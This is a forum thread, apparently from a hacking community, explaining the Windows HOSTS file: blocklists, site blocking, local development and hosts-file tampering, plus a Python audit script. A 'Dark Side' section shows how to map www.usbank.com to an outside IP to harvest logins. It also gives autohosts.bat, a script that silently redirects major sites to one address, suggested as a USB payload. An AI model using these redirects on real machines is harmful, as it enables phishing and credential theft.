
Browser Redirects With the HOSTS file


sablefoxx


The Newbie's Guide to the HOSTS File


Let me just say, this isn't a 'hack' but it's good to know what the HOSTS file is and how it can be used for good and evil.  :grin:

What is the HOSTS file?
The HOSTS file is basically a DNS; that's what takes those URLs (those 'www.namehere.com' things) and converts them to IP addresses.  This is generally done by a DNS server controlled by the ISP; however, with Windows/Linux, before the computer checks with the DNS server it first checks the HOSTS file for an entry.  Because this is a change to Windows it will affect all browsers: IE, Firefox, etc.

Practical Uses:
The HOSTS file is stored in %systemroot%\drivers\etc  (Windows XP/Vista only).  Change to this directory and open the hosts file in Notepad to edit it.  It is likely that it only contains one or two entries that look something like this:

127.0.0.1       localhost
::1                  localhost



However, some anti-virus programs use this file to store a 'blacklist' of bad websites you'd never want to actually go to (like phishing sites).  If this is so, the hosts file will contain something like this:

127.0.0.1       localhost
127.0.0.1      www.usbank.freehosting.com
::1                  localhost



So instead of going to 'www.usbank.freehosting.com' you go to 127.0.0.1 (your machine), which is probably not running an HTTP server, and thus you get a 'can not find server' error and YAY the virus has been stopped.  You can find large pre-made blacklists all over the internet, like these that block ads ( http://www.hosts-file.net/?s=Download ).  This trait can also be used for censorship (though not extremely effective).  Say you're an employer and wanted to prevent access to myspace.com from your computers; simply add an entry for myspace like so:

127.0.0.1       localhost
127.0.0.1      www.myspace.com
::1                  localhost



And now the computer will not connect to myspace.com anymore (unless they use a proxy/edit the hosts).

The Dark Side:
We can also abuse this trait of Windows to re-direct a user to a website we control, like so:

127.0.0.1       localhost
75.126.15.21     www.usbank.com
::1                  localhost



Now when the user types in 'www.usbank.com' they will go to 75.126.15.21, which could be anything we want (even a fake usbank.com used to gather logins).

Customize the HOSTS file:
First find the IP address of the website you want the user to end up at. To do this, open up a command prompt and type "tracert [website here]".  For example, if we wanted to redirect traffic from yahoo.com to google.com, first we must get Google's IP, so we would type "tracert www.google.com", revealing the IP "64.233.167.147". So in the HOSTS we want to enter:

64.233.167.147  www.yahoo.com



Now all yahoo traffic will end up at google :)

Or we can automate the process with a simple .bat script like so:

Auto-Patch the Hosts File to do Your Will
(Copy paste this text into a word document and save as autohosts.bat)

@echo off
cls
echo Patching HOSTS file...
cd %systemroot%
cd system32
cd drivers
cd etc
::  Add your own redirects!  Here is the syntax
:: echo [IP]  [URL] >>hosts
:: When  a person types in the URL above they will get redirected to the IP
echo 75.126.15.21  www.google.com >>hosts
echo 75.126.15.21  www.digg.com >>hosts
echo 75.126.15.21  www.yahoo.com >>hosts
echo 75.126.15.21  www.gmail.com >>hosts
echo 75.126.15.21 www.slashdot.org >>hosts
echo 75.126.15.21 www.youtube.com >>hosts
echo 75.126.15.21 www.cnn.com >>hosts
echo 75.126.15.21 www.walmart.com >>hosts
echo 75.126.15.21 www.foxnews.com >>hosts
echo 75.126.15.21 www.ebay.com >>hosts
echo 75.126.15.21 www.wikipedia.org >>hosts
echo 75.126.15.21 www.myspace.com >>hosts
echo 75.126.15.21 www.facebook.com >>hosts
echo 75.126.15.21 www.bestbuy.com >>hosts
echo 75.126.15.21 www.aol.com >>hosts
echo 75.126.15.21 www.nytimes.com >>hosts
echo 75.126.15.21 www.symantec.com >>hosts
echo 75.126.15.21 www.hotmail.com >>hosts
echo 75.126.15.21 www.msn.com >>hosts
echo 75.126.15.21 www.imbd.com >>hosts
echo 75.126.15.21 www.microsoft.com >>hosts
echo done!
exit
:: i can see the rick roles alrdy



This will re-direct some of the most commonly visited websites on the internet to the target IP :)  This could even be integrated with a USB payload if one desired so :)  And guys, be mature, don't set up your friend's computer to go to tubgirl or meatspin ;)

More Information:
Check out Security Now Ep. #45 >> http://www.grc.com/securitynow.htm#45
Wikipedia article (much better than mine) >> http://en.wikipedia.org/wiki/Hosts_file

Have Fun!


Sparda Makes a Good Point:

Can I just be clear for a moment, the hosts file doesn't redirect and should not be viewed as such (if you do view it as a way of redirecting a browser, then a DNS server's lookup would also be classifiable as a redirect). The hosts file serves as a way of permanently pointing a host name to an IP address.

It has a genuine use in security. The main one being that if you know the IP address of a named server will never change, you might want to enter this into the hosts file because then your computer isn't relying on a third-party service to know it is going to the correct address. Doing this prevents DNS poisoning via a man-in-the-middle attack. They still could pretend to be the 'trusted' IP address if they were able, but now they have to be able to modify the routes to the trusted IP address rather than just responding maliciously to a DNS query.

"Anything you can do to slow down the bad guys is a good thing" -- Pauldotcom


Perhaps 'Misdirect' is a better choice of words

Not to be a dick, but the HOSTS file is pretty common knowledge among Windows users and is often targeted by Virii to block you from being able to update your virus definitions and also keep you from getting Microsoft updates. There are a lot of threads that already talk about the HOSTS file too, and I have even posted my personal HOSTS file in one of them a while ago.

Also, there are different paths for the HOSTS file depending on the version of Windows you're running. Anything older than XP stores it in the c:\windows folder or the %windir% on the current drive (this is Windows 95, Windows 98).

XP Pro/NT/Windows 2000 is in c:\winnt\system32\drivers\etc\hosts, while all other versions of XP other than XP Pro are in c:\windows\system32\drivers\etc\hosts. Server 2003 and Vista I think are c:\windows\system32\drivers\etc but I can not confirm this on Server 2003 and Vista since I am not running them at the moment. A quick Google will probably give you the path though.


Not to be a dick, but the HOSTS file is pretty common knowledge among windows users

Actually that's what I thought, but like the last 20 people I've talked to had no idea about it.  This is more a newbie's guide to the hosts file (it's not that complicated).


  • 1 month later...

Years ago when I moved to a new city and didn't have internet, but still wanted to work on webpages and have them viewable on the network... I edited all the hosts files on the computers to direct the url to the ip of my computer on the network.

It was easier than editing wamp to let anyone on the network view it.... remember I didn't have internet.

Hope that opens some minds as to weird MacGyver uses for the hosts file.


Can I just be clear for a moment, the hosts file doesn't redirect and should not be viewed as such (if you do view it as a way of redirecting a browser, then a DNS server's lookup would also be classifiable as a redirect). The hosts file serves as a way of permanently pointing a host name to an IP address.

It has a genuine use in security. The main one being that if you know the IP address of a named server will never change, you might want to enter this into the hosts file because then your computer isn't relying on a third-party service to know it is going to the correct address. Doing this prevents DNS poisoning via a man-in-the-middle attack. They still could pretend to be the 'trusted' IP address if they were able, but now they have to be able to modify the routes to the trusted IP address rather than just responding maliciously to a DNS query.

"Anything you can do to slow down the bad guys is a good thing" -- Pauldotcom

bad spelling and obviuse mistakes = GB spell checking + firefox + windows = fail


It's a pretty nasty (and simple) sploit, but this only works on IE. Even though it says it's javascript, it's actually VBScript. fso writes will not run on Opera (or Firefox as far as I know). Unless you have your IE browser set to allow all active-x and scripting, you should get an alert prompt or the yellow bar explaining it wants to block it from running and you have to manually allow it. Then again, an active-x sploit with this as the payload might go undetected.

I have my firewall set up to not allow changes to the hosts file, so either way, I get alerted if something tries to write to or change it.

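Added example, not code from any poster in this thread: a hosts-file audit in Python that parses entries, flags the kinds of overrides discussed above (update hosts pointed at the local machine, login sites pinned to an outside address), and lists entries that are new relative to a known-good baseline. The sample file, the `WATCHED` list and the `.example` names are assumptions made for illustration; `75.126.15.21` is the address used in the thread's own examples.

```python
import ipaddress

# Constructed sample. 75.126.15.21 is the address used in the thread's
# examples; every other non-default entry is made up for illustration.
SAMPLE_HOSTS = """\
# sample hosts file (constructed)
127.0.0.1       localhost
::1             localhost
127.0.0.1       www.myspace.com            # block entry
75.126.15.21    www.usbank.com www.yahoo.com
0.0.0.0         update.av-vendor.example
192.168.1.20    dev.mysite.example         # LAN web server
not-an-ip       www.example.org
"""
# Hypothetical watch list: names that should never be answered locally.
WATCHED = {"www.usbank.com", "update.av-vendor.example"}

def parse_hosts(text):
    """Yield (line_no, ip_or_None, names) for every non-comment entry."""
    for no, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            ip = None  # unparsable address field: report it, do not skip it
        yield no, ip, [name.lower().rstrip(".") for name in fields[1:]]

def classify(ip, name, watched):
    if ip is None:
        return "malformed"
    if name == "localhost":
        return None if ip.is_loopback else "localhost-remapped"
    if name in watched:
        return "watched-name-overridden"
    if ip.is_loopback or ip.is_unspecified:
        return "sinkholed"
    return "pinned-private" if ip.is_private else "pinned-public"

def audit(text, watched=WATCHED):
    """Return (line_no, name, finding) for each entry needing review."""
    hits = ((no, n, classify(ip, n, watched))
            for no, ip, names in parse_hosts(text) for n in names)
    return [h for h in hits if h[2]]

def new_entries(baseline, current):
    """Entries present in `current` but not in a known-good baseline."""
    def pairs(text):
        return {(str(ip), n) for _, ip, names in parse_hosts(text)
                if ip is not None for n in names}
    return sorted(pairs(current) - pairs(baseline))
```

On a real machine, pass the contents of the system hosts file to `audit()` and keep a copy of the last reviewed file as the baseline for `new_entries()`.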
